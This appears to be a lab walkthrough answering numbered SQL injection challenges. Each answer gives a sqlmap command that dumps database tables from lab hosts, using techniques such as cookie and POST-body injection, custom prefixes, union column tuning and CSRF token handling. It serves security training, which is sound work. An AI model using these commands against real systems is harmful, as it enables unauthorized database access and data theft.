Questions

What's the contents of table flag2? (Case #2)

Intercept POST request with burpsuite

sqlmap -r req.txt --batch --dump

What's the contents of table flag3? (Case #3)

Intercept GET request with burpsuite

There is Cookie Value: id=1

sqlmap -u http://159.65.95.114:31469/case3.php --cookie='id=1*' --dump --batch

What's the contents of table flag4? (Case #4)

When dealing with HTTP requests, it is best to use the option -r .

Intercept GET request and POST request with JSON data

sqlmap -r req.txt

What's the contents of table flag5? (Case #5)

sqlmap -u http://159.65.95.114:32275/case5.php?id=1 --risk=3 --level=5 -T flag5 --no-cast --batch --dump

What's the contents of table flag6? (Case #6)

sqlmap http://159.65.95.114:31761/case6.php?col=id --random-agent --batch --dump --prefix='`)' --level=5 --risk=3

What's the contents of table flag7? (Case #7)

sqlmap http://167.172.52.160:30242/case7.php?id=1 --union-cols=5 --dump --no-cast

What's the contents of table flag1 in the testdb database? (Case #1)

sqlmap -u "http://209.97.136.59:31969/case1.php?id=1" --dump -T flag1 -D testdb

What's the name of the column containing "style" in it's name? (Case #1)

sqlmap -u "http://209.97.136.59:31969/case1.php?id=1" --search -C style

What's the contents of table flag8? (Case #8)

use burpsuite to intercept submit request from website

sqlmap -u "http://167.172.52.160:31783/case8.php" --data="id=1&t0ken=pAvZKhwTBLJh78UYd1yhpQBzCBCYdYGtZoWp1pZL4" --csrf-token="t0ken" --batch --dump

Last updated